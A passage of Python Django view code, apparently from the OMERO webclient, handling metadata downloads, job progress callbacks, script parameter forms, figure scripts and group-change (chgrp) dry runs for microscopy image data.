raise Http404("No Image found with ID %s" % imageId)
om = image.loadOriginalMetadata()
txtLines = ["[Global Metadata]"]
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[1]])
txtLines.append("[Series Metadata]")
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[2]])
rspText = "\n".join(txtLines)
rsp = HttpResponse(rspText)
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = len(rspText)
rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
"""
Page displays a simple "Preparing download..." message and redirects to
the 'url'.
We construct the url and query string from request: 'url' and 'ids'.
"""
format = request.GET.get("format", None)
if format is not None:
download_url = reverse("download_as")
zipName = "Export_as_%s" % format
else:
download_url = reverse("archived_files")
zipName = "OriginalFileDownload"
targetIds = request.GET.get("ids") # E.g. image-1|image-2
defaultName = request.GET.get("name", zipName) # default zip name
defaultName = os.path.basename(defaultName) # remove path
if targetIds is None:
raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
ids = targetIds.split("|")
fileLists = []
fileCount = 0
filesTotalSize = 0
# If we're downloading originals, list original files so user can
# download individual files.
if format is None:
imgIds = []
wellIds = []
for i in ids:
if i.split("-")[0] == "image":
imgIds.append(i.split("-")[1])
elif i.split("-")[0] == "well":
wellIds.append(i.split("-")[1])
images = []
# Get images...
if imgIds:
images = list(conn.getObjects("Image", imgIds))
if len(images) == 0:
raise Http404("No images found.")
# Have a list of files per fileset (or per image without fileset)
fsIds = set()
fileIds = set()
for image in images:
fs = image.getFileset()
if fs is not None:
# Make sure we've not processed this fileset before.
if fs.id in fsIds:
continue
fsIds.add(fs.id)
files = list(image.getImportedImageFiles())
fList = []
for f in files:
if f.id in fileIds:
continue
fileIds.add(f.id)
fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
filesTotalSize += f.getSize()
if len(fList) > 0:
fileLists.append(fList)
fileCount = sum([len(fList) for fList in fileLists])
else:
# E.g. JPEG/PNG - 1 file per image
fileCount = len(ids)
query = "&".join([_id.replace("-", "=") for _id in ids])
download_url = download_url + "?" + query
if format is not None:
download_url = download_url + "&format=%s" % format
context = {
"template": "webclient/annotations/download_placeholder.html",
"url": download_url,
"defaultName": defaultName,
"fileLists": fileLists,
"fileCount": fileCount,
"filesTotalSize": filesTotalSize,
}
if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
"""
Loads the calendar which is displayed in the left panel of the history
page.
Shows current month by default. Filter by experimenter
"""
template = "webclient/history/calendar.html"
filter_user_id = request.session.get("user_id")
if year is not None and month is not None:
controller = BaseCalendar(conn=conn, year=year, month=month, eid=filter_user_id)
else:
today = datetime.datetime.today()
controller = BaseCalendar(
conn=conn, year=today.year, month=today.month, eid=filter_user_id
)
controller.create_calendar()
context = {"controller": controller}
context["template"] = template
return context
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
""" The data for a particular date that is loaded into the center panel """
if year is None or month is None or day is None:
raise Http404("Year, month, and day are required")
template = "webclient/history/history_details.html"
# get page
page = int(request.GET.get("page", 1))
filter_user_id = request.session.get("user_id")
controller = BaseCalendar(
conn=conn, year=year, month=month, day=day, eid=filter_user_id
)
controller.get_items(page)
context = {"controller": controller}
context["template"] = template
return context
def getObjectUrl(conn, obj):
"""
This provides a url to browse to the specified omero.model.ObjectI P/D/I,
S/P, FileAnnotation etc. used to display results from the scripting
service
E.g webclient/userdata/?path=image-12601
If the object is a file annotation, try to browse to the parent P/D/I
"""
base_url = reverse(viewname="load_template", args=["userdata"])
# if we have a File Annotation, then we want our URL to be for the parent
# object...
if isinstance(obj, omero.model.FileAnnotationI):
fa = conn.getObject("Annotation", obj.id.val)
for ptype in ["project", "dataset", "image"]:
links = list(fa.getParentLinks(ptype))
if len(links) > 0:
obj = links[0].parent
break
if obj.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
otype = obj.__class__.__name__[:-1].lower()
base_url += "?show=%s-%s" % (otype, obj.id.val)
return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
"""Update a callback handle with key/value pairs"""
for key, value in kwargs.items():
request.session["callback"][cbString][key] = value
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
"""
This refreshes callback handles (delete, scripts, chgrp etc) and provides
html to update Activities window & Progressbar.
The returned html contains details for ALL callbacks in web session,
regardless of their status.
We also add counts of jobs, failures and 'in progress' to update status
bar.
"""
in_progress = 0
failure = 0
new_results = []
_purgeCallback(request)
# If we have a jobId (not added to request.session) just process it...
# ONLY used for chgrp/chown dry-run.
jobId = request.GET.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("job status: %s", status)
rsp = prx.getResponse()
if rsp is not None:
rv = graphResponseMarshal(conn, rsp)
rv["finished"] = True
else:
rv = {"finished": False}
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
except IceException:
rv = {"finished": True}
return rv
elif request.method == "DELETE":
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
jobId = json_data.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
rv = {"jobId": jobId}
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("pre-cancel() job status: %s", status)
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
prx.cancel()
except omero.LockTimeout:
# expected that it will take > 5 seconds to cancel
logger.info("Timeout on prx.cancel()")
return rv
# test each callback for failure, errors, completion, results etc
for cbString in request.session.get("callback").keys():
callbackDict = request.session["callback"][cbString]
job_type = callbackDict["job_type"]
status = callbackDict["status"]
if status == "failed":
failure += 1
request.session.modified = True
# update chgrp / chown
if job_type in ("chgrp", "chown"):
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
rsp = prx.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error(
"%s failed with: %s" % (job_type, rsp_params)
)
update_callback(
request,
cbString,
status="failed",
report="%s %s" % (rsp.name, rsp_params),
error=1,
)
elif isinstance(rsp, omero.cmd.OK):
update_callback(request, cbString, status="finished")
else:
in_progress += 1
finally:
prx.close(close_handle)
except Exception:
logger.info(
"Activities %s handle not found: %s" % (job_type, cbString)
)
continue
elif job_type == "send_email":
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
callback = omero.callbacks.CmdCallbackI(
conn.c, prx, foreground_poll=True
)
rsp = callback.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error("send_email failed with: %s" % rsp_params)
update_callback(
request,
cbString,
status="failed",
report={"error": rsp_params},
error=1,
)
else:
total = (
rsp.success
+ len(rsp.invalidusers)
+ len(rsp.invalidemails)
)
update_callback(
request,
cbString,
status="finished",
rsp={"success": rsp.success, "total": total},
)
if (
len(rsp.invalidusers) > 0
or len(rsp.invalidemails) > 0
):
invalidusers = [
e.getFullName()
for e in list(
conn.getObjects(
"Experimenter", rsp.invalidusers
)
)
]
update_callback(
request,
cbString,
report={
"invalidusers": invalidusers,
"invalidemails": rsp.invalidemails,
},
)
else:
in_progress += 1
finally:
callback.close(close_handle)
except Exception:
logger.error(traceback.format_exc())
logger.info("Activities send_email handle not found: %s" % cbString)
# update delete
elif job_type == "delete":
if status not in ("failed", "finished"):
try:
handle = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
cb = omero.callbacks.CmdCallbackI(
conn.c, handle, foreground_poll=True
)
rsp = cb.getResponse()
close_handle = False
try:
if not rsp: # Response not available
update_callback(
request,
cbString,
error=0,
status="in progress",
dreport=_formatReport(handle),
)
in_progress += 1
else: # Response available
close_handle = True
new_results.append(cbString)
rsp = cb.getResponse()
err = isinstance(rsp, omero.cmd.ERR)
if err:
update_callback(
request,
cbString,
error=1,
status="failed",
dreport=_formatReport(handle),
)
failure += 1
else:
update_callback(
request,
cbString,
error=0,
status="finished",
dreport=_formatReport(handle),
)
finally:
cb.close(close_handle)
except Ice.ObjectNotExistException:
update_callback(
request, cbString, error=0, status="finished", dreport=None
)
except Exception as x:
logger.error(traceback.format_exc())
logger.error("Status job '%s'error:" % cbString)
update_callback(
request, cbString, error=1, status="failed", dreport=str(x)
)
failure += 1
# update scripts
elif job_type == "script":
# if error on runScript, the cbString is not a ProcessCallback...
if not cbString.startswith("ProcessCallback"):
continue # ignore
if status not in ("failed", "finished"):
logger.info("Check callback on script: %s" % cbString)
try:
proc = omero.grid.ScriptProcessPrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
except IceException:
update_callback(
request,
cbString,
status="failed",
Message="No process found for job",
error=1,
)
continue
cb = omero.scripts.ProcessCallbackI(conn.c, proc)
# check if we get something back from the handle...
if cb.block(0): # ms.
cb.close()
try:
# we can only retrieve this ONCE - must save results
results = proc.getResults(0, conn.SERVICE_OPTS)
update_callback(request, cbString, status="finished")
new_results.append(cbString)
except Exception:
update_callback(
request,
cbString,
status="finished",
Message="Failed to get results",
)
logger.info("Failed on proc.getResults() for OMERO.script")
continue
# value could be rstring, rlong, robject
rMap = {}
for key, value in results.items():
v = value.getValue()
if key in ("stdout", "stderr", "Message"):
if key in ("stderr", "stdout"):
# just save the id of original file
v = v.id.val
update_kwargs = {key: v}
update_callback(request, cbString, **update_kwargs)
else:
if hasattr(v, "id"):
# do we have an object (ImageI,
# FileAnnotationI etc)
obj_data = {
"id": v.id.val,
"type": v.__class__.__name__[:-1],
}
obj_data["browse_url"] = getObjectUrl(conn, v)
if v.isLoaded() and hasattr(v, "file"):
# try:
mimetypes = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if v.file.mimetype.val in mimetypes:
obj_data["fileType"] = mimetypes[
v.file.mimetype.val
]
obj_data["fileId"] = v.file.id.val
obj_data["name"] = v.file.name.val
# except Exception:
# pass
if v.isLoaded() and hasattr(v, "name"):
# E.g Image, OriginalFile etc
name = unwrap(v.name)
if name is not None:
# E.g. FileAnnotation has null name
obj_data["name"] = name
rMap[key] = obj_data
else:
rMap[key] = unwrap(v)
update_callback(request, cbString, results=rMap)
else:
in_progress += 1
# having updated the request.session, we can now prepare the data for http
# response
rv = {}
for cbString in request.session.get("callback").keys():
# make a copy of the map in session, so that we can replace non
# json-compatible objects, without modifying session
rv[cbString] = copy.copy(request.session["callback"][cbString])
# return json (used for testing)
if "template" in kwargs and kwargs["template"] == "json":
for cbString in request.session.get("callback").keys():
rv[cbString]["start_time"] = str(
request.session["callback"][cbString]["start_time"]
)
rv["inprogress"] = in_progress
rv["failure"] = failure
rv["jobs"] = len(request.session["callback"])
return JsonResponse(rv) # json
jobs = []
new_errors = False
for key, data in rv.items():
# E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
# create id we can use as html id,
# E.g. 39f77932-c447-40d8-8f99-910b5a531a25
if len(key.split(" ")) > 0:
htmlId = key.split(" ")[0]
if len(htmlId.split("/")) > 1:
htmlId = htmlId.split("/")[1]
rv[key]["id"] = htmlId
rv[key]["key"] = key
if key in new_results:
rv[key]["new"] = True
if "error" in data and data["error"] > 0:
new_errors = True
jobs.append(rv[key])
jobs.sort(key=lambda x: x["start_time"], reverse=True)
context = {
"sizeOfJobs": len(request.session["callback"]),
"jobs": jobs,
"inprogress": in_progress,
"new_results": len(new_results),
"new_errors": new_errors,
"failure": failure,
}
context["template"] = "webclient/activities/activitiesContent.html"
return context
@login_required()
def activities_update(request, action, **kwargs):
"""
If the above 'action' == 'clean' then we clear jobs from
request.session['callback'] either a single job (if 'jobKey' is specified
in POST) or all jobs (apart from those in progress)
"""
request.session.modified = True
if action == "clean":
if "jobKey" in request.POST:
jobId = request.POST.get("jobKey")
rv = {}
if jobId in request.session["callback"]:
del request.session["callback"][jobId]
request.session.modified = True
rv["removed"] = True
else:
rv["removed"] = False
return JsonResponse(rv)
else:
jobs = list(request.session["callback"].items())
for key, data in jobs:
if data["status"] != "in progress":
del request.session["callback"][key]
return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
""" Returns the experimenter's photo """
photo = conn.getExperimenterPhoto(oid)
return HttpResponse(photo, content_type="image/jpeg")
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
""" Delegates to webgateway, using share connection if appropriate """
kwargs["viewport_server"] = (
share_id is not None and reverse("webindex") + share_id or reverse("webindex")
)
# remove any trailing slash
kwargs["viewport_server"] = kwargs["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
"""
List the available scripts - Just officical scripts for now
If all scripts are under a single top-level directory, this is
removed by default. To prevent this, use ?full_path=true
"""
scriptService = conn.getScriptService()
scripts = scriptService.getScripts()
# group scripts into 'folders' (path), named by parent folder name
scriptMenu = {}
scripts_to_ignore = (
request.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in scripts:
scriptId = s.id.val
path = s.path.val
name = s.name.val
fullpath = os.path.join(path, name)
if fullpath in scripts_to_ignore:
logger.info("Ignoring script %r" % fullpath)
continue
# We want to build a hierarchical <ul> <li> structure
# Each <ul> is a {}, each <li> is either a script 'name': <id> or
# directory 'name': {ul}
ul = scriptMenu
dirs = fullpath.split(os.path.sep)
for li, d in enumerate(dirs):
if len(d) == 0:
continue
if d not in ul:
# if last component in path:
if li + 1 == len(dirs):
ul[d] = scriptId
else:
ul[d] = {}
ul = ul[d]
# convert <ul> maps into lists and sort
def ul_to_list(ul):
dir_list = []
for name, value in ul.items():
if isinstance(value, dict):
# value is a directory
dir_list.append({"name": name, "ul": ul_to_list(value)})
else:
dir_list.append({"name": name, "id": value})
dir_list.sort(key=lambda x: x["name"].lower())
return dir_list
scriptList = ul_to_list(scriptMenu)
# If we have a single top-level directory, we can skip it
if not request.GET.get("full_path") and len(scriptList) == 1:
scriptList = scriptList[0]["ul"]
return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
"""
Generates an html form for the parameters of a defined script.
"""
scriptService = conn.getScriptService()
try:
params = scriptService.getParams(long(scriptId))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/scripts/no_processor.html",
"scriptId": scriptId,
}
raise ex
if params is None:
return HttpResponse()
paramData = {}
paramData["id"] = long(scriptId)
paramData["name"] = params.name.replace("_", " ")
paramData["description"] = params.description
paramData["authors"] = ", ".join([a for a in params.authors])
paramData["contact"] = params.contact
paramData["version"] = params.version
paramData["institutions"] = ", ".join([i for i in params.institutions])
inputs = [] # use a list so we can sort by 'grouping'
Data_TypeParam = None
IDsParam = None
for key, param in params.inputs.items():
i = {}
i["name"] = key.replace("_", " ")
i["key"] = key
if not param.optional:
i["required"] = True
i["description"] = param.description
if param.min:
i["min"] = str(param.min.getValue())
if param.max:
i["max"] = str(param.max.getValue())
if param.values:
i["options"] = [v.getValue() for v in param.values.getValue()]
if param.useDefault:
i["default"] = unwrap(param.prototype)
if isinstance(i["default"], omero.model.IObject):
i["default"] = None
pt = unwrap(param.prototype)
if pt.__class__.__name__ == "dict":
i["map"] = True
elif pt.__class__.__name__ == "list":
i["list"] = True
if "default" in i:
i["default"] = ",".join([str(d) for d in i["default"]])
elif isinstance(pt, bool):
i["boolean"] = True
elif isinstance(pt, int) or isinstance(pt, long):
# will stop the user entering anything other than numbers.
i["number"] = "number"
elif isinstance(pt, float):
i["number"] = "float"
# if we got a value for this key in the page request, use this as
# default
if request.GET.get(key, None) is not None:
i["default"] = request.GET.get(key, None)
# E.g "" (string) or [0] (int list) or 0.0 (float)
i["prototype"] = unwrap(param.prototype)
i["grouping"] = param.grouping
inputs.append(i)
if key == "IDs":
IDsParam = i # remember these...
if key == "Data_Type":
Data_TypeParam = i
inputs.sort(key=lambda i: i["grouping"])
# if we have Data_Type param - use the request parameters to populate IDs
if (
Data_TypeParam is not None
and IDsParam is not None
and "options" in Data_TypeParam
):
IDsParam["default"] = ""
for dtype in Data_TypeParam["options"]:
if request.GET.get(dtype, None) is not None:
Data_TypeParam["default"] = dtype
IDsParam["default"] = request.GET.get(dtype, "")
break # only use the first match
# if we've not found a match, check whether we have "Well" selected
if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
if "Image" in Data_TypeParam["options"]:
wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
wellIdx = 0
try:
wellIdx = int(request.GET.get("Index", 0))
except Exception:
pass
wells = conn.getObjects("Well", wellIds)
imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
Data_TypeParam["default"] = "Image"
IDsParam["default"] = ",".join(imgIds)
# try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
# level now (not recursive!)
for i in range(len(inputs)):
if len(inputs) <= i:
# we may remove items from inputs as we go - need to check
break
param = inputs[i]
grouping = param["grouping"] # E.g 03
param["children"] = list()
while len(inputs) > i + 1:
nextGrp = inputs[i + 1]["grouping"] # E.g. 03.1
if nextGrp.split(".")[0] == grouping:
param["children"].append(inputs[i + 1])
inputs.pop(i + 1)
else:
break
paramData["inputs"] = inputs
return {
"template": "webclient/scripts/script_ui.html",
"paramData": paramData,
"scriptId": scriptId,
}
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
"""
Show a UI for running figure scripts
"""
imageIds = request.GET.get("Image", None) # comma - delimited list
datasetIds = request.GET.get("Dataset", None)
wellIds = request.GET.get("Well", None)
if wellIds is not None:
wellIds = [long(i) for i in wellIds.split(",")]
wells = conn.getObjects("Well", wellIds)
wellIdx = getIntOrDefault(request, "Index", 0)
imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
imageIds = ",".join(imageIds)
if imageIds is None and datasetIds is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def validateIds(dtype, ids):
ints = [int(oid) for oid in ids.split(",")]
validObjs = {}
for obj in conn.getObjects(dtype, ints):
validObjs[obj.id] = obj
filteredIds = [iid for iid in ints if iid in validObjs.keys()]
if len(filteredIds) == 0:
raise Http404("No %ss found with IDs %s" % (dtype, ids))
else:
# Now we can specify group context - All should be same group
gid = list(validObjs.values())[0].getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
return filteredIds, validObjs
context = {}
if imageIds is not None:
imageIds, validImages = validateIds("Image", imageIds)
context["idString"] = ",".join([str(i) for i in imageIds])
context["dtype"] = "Image"
if datasetIds is not None:
datasetIds, validDatasets = validateIds("Dataset", datasetIds)
context["idString"] = ",".join([str(i) for i in datasetIds])
context["dtype"] = "Dataset"
if scriptName == "SplitView":
scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
template = "webclient/scripts/split_view_figure.html"
# Lookup Tags & Datasets (for row labels)
imgDict = [] # A list of data about each image.
for iId in imageIds:
data = {"id": iId}
img = validImages[iId]
data["name"] = img.getName()
tags = [
ann.getTextValue()
for ann in img.listAnnotations()
if ann._obj.__class__ == omero.model.TagAnnotationI
]
data["tags"] = tags
data["datasets"] = [d.getName() for d in img.listParents()]
imgDict.append(data)
# Use the first image as a reference
image = validImages[imageIds[0]]
context["imgDict"] = imgDict
context["image"] = image
context["channels"] = image.getChannels()
elif scriptName == "Thumbnail":
scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
template = "webclient/scripts/thumbnail_figure.html"
def loadImageTags(imageIds):
tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
linkMap = {} # group tags. {imageId: [tags]}
tagMap = {}
for iId in imageIds:
linkMap[iId] = []
for link in tagLinks:
c = link.getChild()
if c._obj.__class__ == omero.model.TagAnnotationI:
tagMap[c.id] = c
linkMap[link.getParent().id].append(c)
imageTags = []
for iId in imageIds:
imageTags.append({"id": iId, "tags": linkMap[iId]})
tags = []
for tId, t in tagMap.items():
tags.append(t)
return imageTags, tags
thumbSets = [] # multiple collections of images
tags = []
figureName = "Thumbnail_Figure"
if datasetIds is not None:
for d in conn.getObjects("Dataset", datasetIds):
imgIds = [i.id for i in d.listChildren()]
imageTags, ts = loadImageTags(imgIds)
thumbSets.append({"name": d.getName(), "imageTags": imageTags})
tags.extend(ts)
figureName = thumbSets[0]["name"]
else:
imageTags, ts = loadImageTags(imageIds)
thumbSets.append({"name": "images", "imageTags": imageTags})
tags.extend(ts)
parent = conn.getObject("Image", imageIds[0]).getParent()
figureName = parent.getName() or "Thumbnail Figure"
context["parent_id"] = parent.getId()
uniqueTagIds = set() # remove duplicates
uniqueTags = []
for t in tags:
if t.id not in uniqueTagIds:
uniqueTags.append(t)
uniqueTagIds.add(t.id)
uniqueTags.sort(key=lambda x: x.getTextValue().lower())
context["thumbSets"] = thumbSets
context["tags"] = uniqueTags
context["figureName"] = figureName.replace(" ", "_")
elif scriptName == "MakeMovie":
scriptPath = "/omero/export_scripts/Make_Movie.py"
template = "webclient/scripts/make_movie.html"
# expect to run on a single image at a time
image = conn.getObject("Image", imageIds[0])
# remove extension (if 3 chars or less)
movieName = image.getName().rsplit(".", 1)
if len(movieName) > 1 and len(movieName[1]) > 3:
movieName = ".".join(movieName)
else:
movieName = movieName[0]
# make sure name is not a path
context["movieName"] = os.path.basename(movieName)
chs = []
for c in image.getChannels():
chs.append(
{
"active": c.isActive(),
"color": c.getColor().getHtml(),
"label": c.getLabel(),
}
)
context["channels"] = chs
context["sizeT"] = image.getSizeT()
context["sizeZ"] = image.getSizeZ()
scriptService = conn.getScriptService()
scriptId = scriptService.getScriptID(scriptPath)
if scriptId < 0:
raise AttributeError("No script found for path '%s'" % scriptPath)
context["template"] = template
context["scriptId"] = scriptId
return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
"""
Check whether Images / Datasets etc contain partial Multi-image filesets.
Used by chgrp or delete dialogs to test whether we can perform this
'action'.
"""
dtypeIds = {}
for dtype in ("Image", "Dataset", "Project"):
ids = request.GET.get(dtype, None)
if ids is not None:
dtypeIds[dtype] = [int(i) for i in ids.split(",")]
splitFilesets = conn.getContainerService().getImagesBySplitFilesets(
dtypeIds, None, conn.SERVICE_OPTS
)
splits = []
for fsId, splitIds in splitFilesets.items():
splits.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
context = {"split_filesets": splits}
context["action"] = action
if action == "chgrp":
context["action"] = "move"
context["template"] = "webclient/activities/" "fileset_check_dialog_content.html"
return context
def getAllObjects(
conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
"""
Given a list of containers and images, calculate all the descendants
and necessary siblings (for any filesets)
"""
# TODO Handle None inputs, maybe add defaults
params = omero.sys.ParametersI()
qs = conn.getQueryService()
project_ids = set(project_ids)
dataset_ids = set(dataset_ids)
image_ids = set(image_ids)
fileset_ids = set([])
plate_ids = set(plate_ids)
screen_ids = set(screen_ids)
# Get any datasets for projects
if project_ids:
params.map = {}
params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
q = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
dataset_ids.add(e[0].val)
# Get any plates for screens
if screen_ids:
params.map = {}
params.map["sids"] = rlist([rlong(x) for x in screen_ids])
q = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
plate_ids.add(e[0].val)
# Get any images for datasets
if dataset_ids:
params.map = {}
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
q = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Some images in Dataset may not have fileset
if e[1] is not None:
fileset_ids.add(e[1].val)
# Get any images for plates
# TODO Seemed no need to add the filesets for plates as it isn't possible
# to link it from outside of its plate. This may be true for the client,
# but it certainly isn't true for the model so maybe allow this to also get
# filesets
if plate_ids:
params.map = {}
params.map["plids"] = rlist([rlong(x) for x in plate_ids])
q = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any extra images due to filesets
if fileset_ids:
params.map = {}
params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
q = """
select image.id
from Image image
left outer join image.datasetLinks dilink
where image.fileset.id in (select fs.id
from Image im
join im.fileset fs
where fs.id in (:fsids)
group by fs.id
having count(im.id)>1)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any additional datasets that may need updating as their children have
# been snatched.
# TODO Need to differentiate which orphaned directories need refreshing
extra_dataset_ids = set([])
extra_orphaned = False
if image_ids:
params.map = {
"iids": rlist([rlong(x) for x in image_ids]),
}
exclude_datasets = ""
if dataset_ids:
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
# Make sure to allow parentless results as well as those
# that do not match a dataset being removed
exclude_datasets = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
q = (
"""
select distinct dilink.parent.id
from Image image
left outer join image.datasetLinks dilink
where image.id in (:iids)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:iids)) = 0
"""
% exclude_datasets
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
if e:
extra_dataset_ids.add(e[0].val)
else:
extra_orphaned = True
# Get any additional projects that may need updating as their children have
# been snatched. There is no need to check for orphans because if a dataset
# is being removed from somewhere else, it can not exist as an orphan.
extra_project_ids = set([])
if dataset_ids:
params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
exclude_projects = ""
if project_ids:
params.map["pids"] = rlist([rlong(x) for x in project_ids])
exclude_projects = "and pdlink.parent.id not in (:pids)"
q = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% exclude_projects
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
extra_project_ids.add(e[0].val)
# We now have the complete list of objects that will change group
# We also have an additional list of datasets/projects that may have had
# snatched children and thus may need updating in the client if the
# dataset/project has gone from N to 0 children
result = {
# These objects are completely removed
"remove": {
"project": list(project_ids),
"dataset": list(dataset_ids),
"screen": list(screen_ids),
"plate": list(plate_ids),
"image": list(image_ids),
},
# These objects now have no children
"childless": {
"project": list(extra_project_ids),
"dataset": list(extra_dataset_ids),
"orphaned": extra_orphaned,
},
}
return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
return dryRun(request, action="chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
"""Submit chgrp or chown dry-run"""
targetObjects = {}
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for dtype in dtypes:
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
targetObjects[dtype] = obj_ids
if action == "chgrp":
target_id = getIntOrDefault(request, "group_id", None)
elif action == "chown":
target_id = getIntOrDefault(request, "owner_id", None)
handle = conn.submitDryRun(action, targetObjects, target_id)
jobId = str(handle)
return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
"""
Moves data to a new group, using the chgrp queue.
Handles submission of chgrp form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
# Get the target group_id
group_id = getIntOrDefault(request, "group_id", None)
if group_id is None:
return JsonResponse({"Error": "chgrp: No group_id specified"})
group_id = long(group_id)
def getObjectOwnerId(r):
for t in ["Dataset", "Image", "Plate"]:
ids = r.POST.get(t, None)
if ids is not None:
for o in list(conn.getObjects(t, ids.split(","))):
return o.getDetails().owner.id.val
group = conn.getObject("ExperimenterGroup", group_id)
new_container_name = request.POST.get("new_container_name", None)
new_container_type = request.POST.get("new_container_type", None)
container_id = None
# Context must be set to owner of data, E.g. to create links.
ownerId = getObjectOwnerId(request)
conn.SERVICE_OPTS.setOmeroUser(ownerId)
if (
new_container_name is not None
and len(new_container_name) > 0
and new_container_type is not None
):
